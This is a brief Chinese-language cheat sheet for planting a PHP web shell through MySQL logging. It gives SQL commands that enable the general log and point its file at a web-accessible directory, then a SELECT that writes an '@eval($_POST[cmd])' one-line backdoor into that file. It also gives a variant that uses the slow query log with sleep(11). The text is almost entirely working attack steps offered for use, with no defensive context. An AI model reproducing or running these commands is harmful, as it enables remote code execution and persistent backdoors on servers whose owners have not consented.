全局日志:
首先查询是否开启了全局日志记录
show variables like '%general%'; 查看是否开启
set global general_log = on; #未开启就手动开启general log 模式
set global general_log_file = 'web可访问目录' #设置日志目录为shell地址
SELECT '<?php @eval($_POST[cmd]);?>' #执行查询 即写入到日志文件
慢日志:
#查询慢日志状态
show variables like '%slow_query_log%';
#查询mysql系统时间
show global variables like '%long_query_time%';
#根据时间 设置超时
select '<?php @eval($_POST[1]);?>' or sleep(11); 设置查询时间为11s